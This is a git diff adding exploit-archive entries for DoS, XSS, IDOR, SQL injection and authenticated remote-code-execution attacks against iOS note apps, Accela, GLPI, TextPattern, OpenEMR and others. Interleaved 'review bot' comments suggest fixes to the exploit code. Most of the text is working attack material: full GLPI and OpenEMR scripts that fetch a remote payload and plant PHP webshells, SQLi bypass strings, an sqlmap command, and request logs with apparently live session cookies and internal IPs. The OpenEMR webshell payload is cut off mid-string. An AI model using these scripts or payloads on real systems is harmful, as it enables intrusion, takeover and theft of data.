diff --git a/exploits/ios/dos/50001.py b/exploits/ios/dos/50001.py
new file mode 100755
index 000000000..b1af08921
--- /dev/null
+++ b/exploits/ios/dos/50001.py
@@ -0,0 +1,35 @@
+# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
+# Date: 06-14-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888
+# Version: 3.0.3
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50002.py b/exploits/ios/dos/50002.py
new file mode 100755
index 000000000..16d88e024
--- /dev/null
+++ b/exploits/ios/dos/50002.py
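Review bot: The `except:` closing the payload.py snippet is a bare except that swallows every error, including KeyboardInterrupt, and the handle returned by `open("payload.txt","w")` is never closed if `f.write` raises; a context manager removes both problems: `with open("payload.txt", "w") as f:` / `    f.write(buffer)` / `print("File created")`, with `except OSError:` if a failure message is still wanted. The same snippet is repeated in 50002.py and 50003.py in this commit, so the fix applies to all three. These files are also committed with mode 100755 while mixing advisory prose with the script, and the `#!/usr/bin/env python` line is not line 1, so running the file directly would fail on the prose before reaching the code; either drop the executable bit or keep the script in its own file.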
@@ -0,0 +1,37 @@
+# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
+# Date: 06-14-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/es/app/post-it/id920127738
+# Version: 5.0.1
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Post-it is vulnerable to a DoS condition when a long list of characters is
+being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new
+payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50003.py b/exploits/ios/dos/50003.py
new file mode 100755
index 000000000..4992488ab
--- /dev/null
+++ b/exploits/ios/dos/50003.py
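Review bot: The bodies of `try:` and `except:` in the payload.py snippet carry no indentation here (`+f = open("payload.txt","w")` follows `+try:` directly), unlike the same snippet in 50001.py, so if the committed file is really laid out this way it stops with an IndentationError before creating anything. The re-flowed advisory lines (`+being used when creating a note:`, `+payload.txt file`) suggest the text passed through a mail client that also stripped leading whitespace, so the indent should be restored from the author's original rather than guessed. 50003.py in this commit has the same lost indentation.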
@@ -0,0 +1,36 @@
+# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
+# Date: 06-14-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
+# Version: 6.4
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Notex – the best notes is vulnerable to a DoS condition when a long list of
+characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49571.py b/exploits/multiple/webapps/49571.py
index 13ef0f1b9..1e8eb13b0 100755
--- a/exploits/multiple/webapps/49571.py
+++ b/exploits/multiple/webapps/49571.py
@@ -1,7 +1,7 @@
 # Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated)
 # Date: 17 Feb 2020
 # Exploit Author: Podalirius
-# PoC demonstration article: https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
+# PoC demonstration article: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
 # Vendor Homepage: https://gitea.io/
 # Software Link: https://dl.gitea.io/
 # Version: >= 1.1.0 to <= 1.12.5
diff --git a/exploits/multiple/webapps/49981.txt b/exploits/multiple/webapps/49981.txt
index 5424be18b..e50e9ad43 100644
--- a/exploits/multiple/webapps/49981.txt
+++ b/exploits/multiple/webapps/49981.txt
@@ -5,6 +5,7 @@ # Software Link: https://www.cerberusftp.com/download/ # Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier # Tested on: windows server 2016 +# CVE: CVE-2019-25046 ------------ About Cerberus FTP Server (From Vendor Site) : diff --git a/exploits/multiple/webapps/49990.txt b/exploits/multiple/webapps/49990.txt new file mode 100644 index 000000000..9d51cf339 --- /dev/null +++ b/exploits/multiple/webapps/49990.txt 
@@ -0,0 +1,74 @@ +# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS) +# Software Link: https://www.accela.com/civic-platform/ +# Version: <= 21.1 +# Author: Abdulazeez Alaseeri +# Tested on: JBoss server/windows +# Type: Web App +# Date: 07/06/2021 +# CVE-2021-34370 + + + +================================================================ +Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 +================================================================ + + +================================================================ +Request Heeaders start +================================================================ + +GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1 + +Host: Hidden + +Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Upgrade-Insecure-Requests: 1 + +Te: trailers + +Connection: close + +================================================================ +Request Heeaders end +================================================================ + + + +================================================================ +Response Heeaders start +================================================================ +HTTP/1.1 200 OK + +Connection: close + +Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter + +X-XSS-Protection: 0 + 
+Content-Type: text/html;charset=ISO-8859-1 + +Content-Length: 73 + +Date: Tue, 08 Jun 2021 10:41:59 GMT + + + + + +================================================================ +Response Heeaders end +================================================================ + +Payload: %27^alert`1`^%27 + +for open redirect, replace the payload to a valid website. \ No newline at end of file diff --git a/exploits/multiple/webapps/49991.txt b/exploits/multiple/webapps/49991.txt new file mode 100644 index 000000000..5a18c8882 --- /dev/null +++ b/exploits/multiple/webapps/49991.txt 
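Review bot: The Cookie header in the request block still carries what look like live session values (`JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode`, `LATEST_SESSION_ID=...`, the BIG-IP persistence cookie) and an internal address (`LATEST_WEB_SERVER=10.198.24.82`), even though `Host:` was replaced with `Hidden`; these identify the tested deployment and, if any of them were still valid, would grant access to it, so they should be redacted the same way before the advisory is published. The same applies to 49991.txt in this commit, whose Cookie header additionally includes an `ACAuth=` token and a second internal address. The section banners also read "Heeaders" for "Headers" (four times here, four times in 49991.txt), and 49991.txt has "manpulating" for "manipulating".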
@@ -0,0 +1,82 @@ +# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR) +# Software Link: https://www.accela.com/civic-platform/ +# Version: <= 21.1 +# Author: Abdulazeez Alaseeri +# Tested on: JBoss server/windows +# Type: Web App +# Date: 07/06/2021 +# CVE: CVE-2021-34369 + + +================================================================ +Accela Civic Platform Insecure Direct Object References <= 21.1 +================================================================ + +This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber +================================================================ +Request Heeaders start +================================================================ + +GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1 + +Host: Hidden + +Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Upgrade-Insecure-Requests: 1 + 
+Te: trailers + +Connection: close + +================================================================ +Request Heeaders end +================================================================ + + + +================================================================ +Response Heeaders start +================================================================ +HTTP/1.1 200 OK + +Expires: Thu, 01 Jan 1970 00:00:01 GMT + +Cache-Control: no-cache + +X-Powered-By: JSP/2.3 + +Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure + +Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure + +Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure + +Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure + +X-XSS-Protection: 0 + +Pragma: No-cache + +X-UA-Compatible: IE=EDGE + +Date: Wed, 09 Jun 2021 04:09:40 GMT + +Connection: close + +Content-Type: text/html;charset=UTF-8 + +Content-Length: 98126 +================================================================ +Response Heeaders end +================================================================ + +contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR \ No newline at end of file diff --git a/exploits/php/webapps/49992.py b/exploits/php/webapps/49992.py new file mode 100755 index 000000000..600414607 --- /dev/null +++ b/exploits/php/webapps/49992.py 
@@ -0,0 +1,241 @@ +# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE) +# Exploit Author: Brian Peters +# Vendor Homepage: https://glpi-project.org +# Software Link: https://github.com/glpi-project/glpi/releases +# Version: < 9.4.6 +# CVE: CVE-2020-11060 + +# Download a SQL dump and find the table offset for "wifinetworks" with +# cat | grep "CREATE TABLE" | grep -n wifinetworks +# Update the offsettable value with this number in the create_dump function +# The Nix/Win paths are based on defaults. You can use curl -I and use md5sum to find the path based +# on the Set-Cookie hash. + +#!/usr/bin/python + +import argparse +import json +import random +import re +import requests +import string +import sys +import time +from datetime import datetime +from lxml import html + +class GlpiBrowser: + + def __init__(self, url, user, password, platform): + self.url = url + self.user = user + self.password = password + self.platform = platform + + self.session = requests.Session() + self.session.verify = False + requests.packages.urllib3.disable_warnings() + + def extract_csrf(self, html): + return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0] + + def get_login_data(self): + r = self.session.get('{0}'.format(self.url), allow_redirects=True) + + csrf_token = self.extract_csrf(r.text) + name_field = re.findall('name="(.*)" id="login_name"', r.text)[0] + pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0] + + return name_field, pass_field, csrf_token + + def login(self): + try: + name_field, pass_field, csrf_token = self.get_login_data() + except Exception as e: + print "[-] Login error: could not retrieve form data" + sys.exit(1) + + data = { + name_field: self.user, + pass_field: self.password, + "auth": "local", + "submit": "Post", + "_glpi_csrf_token": csrf_token + } + + r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False) + + return r.status_code == 302 + + def wipe_networks(self, 
padding, datemod): + r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') + comment = r.content + + r = self.session.get('{0}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9'.format(self.url)) + try: + csrf_token = self.extract_csrf(r.text) + except Exception as e: + print "[-] Edit network error: could not retrieve form data" + sys.exit(1) + + webpage = html.fromstring(r.content) + links = webpage.xpath('//a/@href') + for rawlink in links: + if "wifinetwork.form.php?id=" in rawlink: + rawlinkparts = rawlink.split("=") + networkid = rawlinkparts[-1] + print "Deleting network "+networkid + + data = { + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": comment, + "essid": "RCE"+padding, + "mode": "ad-hoc", + "purge": "Delete permanently", + "id": networkid, + "_glpi_csrf_token": csrf_token, + '_read_date_mod': datemod + } + + r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data) + + def create_network(self, datemod): + r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') + comment = r.content + + r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) + try: + csrf_token = self.extract_csrf(r.text) + except Exception as e: + print "[-] Create network error: could not retrieve form data" + sys.exit(1) + + data = { + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": comment, + "essid": "RCE", + "mode": "ad-hoc", + "add": "ADD", + "_glpi_csrf_token": csrf_token, + '_read_date_mod': datemod + } + + r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data) + print "[+] Network created" + print " Name: PoC" + print " ESSID: RCE" + + def edit_network(self, padding, datemod): + r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') + comment = r.content + #create the padding for the 
name and essid + + + r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) + webpage = html.fromstring(r.content) + links = webpage.xpath('//a/@href') + for rawlink in links: + if "wifinetwork.form.php?id=" in rawlink: + rawlinkparts = rawlink.split('/') + link = rawlinkparts[-1] + + #edit the network name and essid + r = self.session.get('{0}/front/{1}'.format(self.url, link)) + try: + csrf_token = self.extract_csrf(r.text) + except Exception as e: + print "[-] Edit network error: could not retrieve form data" + sys.exit(1) + + rawlinkparts = rawlink.split("=") + networkid = rawlinkparts[-1] + + data = { + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": comment, + "essid": "RCE"+padding, + "mode": "ad-hoc", + "update": "Save", + "id": networkid, + "_glpi_csrf_token": csrf_token, + "_read_date_mod": datemod + } + r = self.session.post('{0}/front/wifinetwork.form.php'.format(self.url), data=data) + print "[+] Network mofified" + print " New ESSID: RCE"+padding + + def create_dump(self, shellname): + path='' + if self.platform == "Win": + path="C:\\xampp\\htdocs\\pics\\" + elif self.platform == "Nix": + path="/var/www/html/glpi/pics/" + + #adjust offset number to match the table number for wifi_networks + #this can be found by downloading a SQL dump and running cat | grep "CREATE TABLE" | grep -n "wifinetworks" + r = self.session.get('{0}/front/backup.php?dump=dump&offsettable=312&fichier={1}{2}'.format(self.url, path, shellname)) + + print '[+] Shell: {0}/pics/{1}'.format(self.url, shellname) + + def shell_check(self, shellname): + r = self.session.get('{0}/pics/{1}?0=echo%20asdfasdfasdf'.format(self.url, shellname)) + print " Shell size: "+str(len(r.content)) + if "asdfasdfasdf" in r.content: + print "[+] RCE FOUND!" 
+ sys.exit(1) + return len(r.content) + + def pwn(self): + if not self.login(): + print "[-] Login error" + return + else: + print "[+] Logged in" + + #create timestamp + now = datetime.now() + datemod = now.strftime("%Y-%m-%d %H:%M:%S") + + #create comment payload + + tick=1 + while True: + #create random shell name + letters = string.ascii_letters + shellname = ''.join(random.choice(letters) for i in range(8))+".php" + + #create padding for ESSID + padding = '' + for i in range(1,int(tick)+1): + padding+=str(i) + + self.wipe_networks(padding, datemod) + self.create_network(datemod) + self.edit_network(padding, datemod) + self.create_dump(shellname) + self.shell_check(shellname) + print "\n" + raw_input("Press any key to continue with the next iteration...") + tick+=1 + + return + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + parser.add_argument("--url", help="Target URL", required=True) + parser.add_argument("--user", help="Username", required=True) + parser.add_argument("--password", help="Password", required=True) + parser.add_argument("--platform", help="Win/Nix", required=True) + + args = parser.parse_args() + + g = GlpiBrowser(args.url, user=args.user, password=args.password, platform=args.platform) + + g.pwn() \ No newline at end of file diff --git a/exploits/php/webapps/49993.txt b/exploits/php/webapps/49993.txt new file mode 100644 index 000000000..6d7852f10 --- /dev/null +++ b/exploits/php/webapps/49993.txt 
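Review bot: `wipe_networks`, `create_network` and `edit_network` each download the payload from `https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt` at run time and use `r.content` without checking `r.status_code`, while `__init__` sets `self.session.verify = False` for every request, so whoever runs this script executes whatever that URL serves at that moment over an unverified connection; shipping the payload file next to the script (or at least verifying the status and a known digest of the downloaded content) would make the behaviour reviewable and reproducible. The four `except Exception as e:` handlers bind `e` and never use it, and the `print` statements plus `raw_input` make the file Python 2 only, which the header should state since `#!/usr/bin/python` sits after the comment block rather than on line 1 and is therefore not an interpreter line. In `shell_check` the success branch ends with `sys.exit(1)`, i.e. a failure exit status, and the `return` after `while True` in `pwn` is unreachable.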
@@ -0,0 +1,24 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)
+# Date: 11/06/2021
+# Exploit Author: BHAVESH KAUL
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Server: XAMPP
+
+# Description #
+
+COVID19 Testing Management System 1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. Anyone can submit a stored XSS payload without login when registering as a new user. This makes the application store our payload in the database and it is fired everything the dashboard is viewed.
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/covid-tms/new-user-testing.php
+2) Enter the following payload in 'State' parameter:
+3) Fill out other information and submit query
+4) Now goto: http://localhost/covid-tms/live-test-updates.php
+5) Stored XSS payload is fired
+
+# Image PoC : Reference Image #
+
+1) Vulnerable Parameter: https://ibb.co/1vyNM2w
+2) Payload Fired: https://ibb.co/CsfPnXK
\ No newline at end of file
diff --git a/exploits/php/webapps/49994.txt b/exploits/php/webapps/49994.txt
new file mode 100644
index 000000000..646052407
--- /dev/null
+++ b/exploits/php/webapps/49994.txt
@@ -0,0 +1,52 @@ +# Exploit Title: Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated) +# Date: 11/06/2021 +# Exploit Author: Riadh Benlamine (rbn0x00) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip +# Version: 1.0 +# Category: Webapps +# Tested on: Apache2+MariaDB latest version +# Description : Stock Management System suffers from SQL injection in '/stock/php_action/changePassword.php' because it does not sanitize the input before pushing into the sql query. Leading to remote code execution. + +- Vulnerable parameter: user_id= +SQLmap command: +-------------- + +sqlmap -u http:///stock/php_action/changePassword.php --data="password=invalidpassword&npassword=test&cpassword=test&user_id=1*" --cookie="PHPSESSID=" --is-dba + +SQLmap Output: +------------- + +Parameter: #1* ((custom) POST) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=(SELECT (CASE WHEN (7792=7792) THEN 1 ELSE (SELECT 5315 UNION SELECT 6564) END)) + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=1 AND (SELECT 8344 FROM (SELECT(SLEEP(5)))RdSH) + +Trick: +----- +We could steal the users cookie by chaining CSRF and stored XSS + + + + + + +
+ + " /> + + + + + +
+
+
+
+
+
+and then use the cookie to preform SQL injection :)
\ No newline at end of file
diff --git a/exploits/php/webapps/49995.txt b/exploits/php/webapps/49995.txt
new file mode 100644
index 000000000..8e99ad281
--- /dev/null
+++ b/exploits/php/webapps/49995.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection
+# Date: 12/06/2021
+# Exploit Author: BHAVESH KAUL
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/small-crm-php/
+# Version: 3.0
+# Tested on: Server: XAMPP
+
+# Description #
+
+Small CRM 3.0 is vulnerable to SQL Injection on it's admin login because of insufficient user supplied data sanitization and the sql injection payload being executed. Attacker is able to access the admin login panel and supply the malicious payload, successfully taking over admin account.
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/crm/admin/
+
+2) Enter the following payload in 'Username' and 'Password' parameter: ' OR 'x'='x
+
+3) SQL Injection successfull
\ No newline at end of file
diff --git a/exploits/php/webapps/49996.txt b/exploits/php/webapps/49996.txt
new file mode 100644
index 000000000..c3df450ac
--- /dev/null
+++ b/exploits/php/webapps/49996.txt
@@ -0,0 +1,43 @@
+# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
+# Date : 2021/09/06
+# Exploit Author : Mert Daş merterpreter@gmail.com
+# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
+# Software web : https://textpattern.com/
+# Tested on: Server : Xampp
+
+First of all we should use file upload section to upload our shell.
+Our shell contains this malicious code:
+
+1) Go to content section .
+2) Click Files and upload malicious php file.
+3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
+
+After upload our file , our request and respons is like below :
+
+Request:
+
+GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
+PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 10 Jun 2021 00:32:41 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
+X-Powered-By: PHP/7.4.20
+Content-Length: 22
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+pc\mertdas
\ No newline at end of file
diff --git a/exploits/php/webapps/49998.py b/exploits/php/webapps/49998.py
new file mode 100755
index 000000000..6bc9ae1e4
--- /dev/null
+++ b/exploits/php/webapps/49998.py
@@ -0,0 +1,133 @@ +# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) +# Date 12.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip +# Version: Prior to 5.0.1.4 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-15139 +# CWE: CWE-434 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139 + +''' +Description: +Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote +authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload +form and accessing it in the images directory. +''' + + +''' +Banner: +''' +banner =""" + ___ _____ __ __ ____ ____ ___ _ _____ + / _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ / + | | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ \ + | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | + \___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/ + |_| + + _____ _ _ _ + | ____|_ ___ __ | | ___ (_) |_ + | _| \ \/ / '_ \| |/ _ \| | __| + | |___ > <| |_) | | (_) | | |_ + |_____/_/\_\ .__/|_|\___/|_|\__| + |_| + +""" +print(banner) + + +''' +Import required modules +''' +import argparse +import requests + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.PATH +username = args.USERNAME +password = args.PASSWORD + +''' +Authentication: +''' +# Preparation: +session = requests.Session() 
+auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' +auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' +response = session.get(auth_chek_url) + +# Header (auth): +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Referer': auth_chek_url, + 'Upgrade-Insecure-Requests': '1', +} + +# Body (auth): +body = { + 'new_login_session_management': '1', + 'authProvider': 'Default', + 'authUser': username, + 'clearPass': password, + 'languageChoice': '1' +} + +# Authentication: +print('') +print('[+] Authentication') +auth = session.post(auth_url,headers=header, data=body) + + +''' +Exploit: +''' +print('') +print('[+] Uploading Webshell:') + +# URL: +exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php' + +# Headers (Exploit): +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------31900464228840324774249185339", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php', + "Upgrade-Insecure-Requests": "1" +} + +# Body (Exploit): +body = 
"-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filedata\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n12000000\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_image\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return 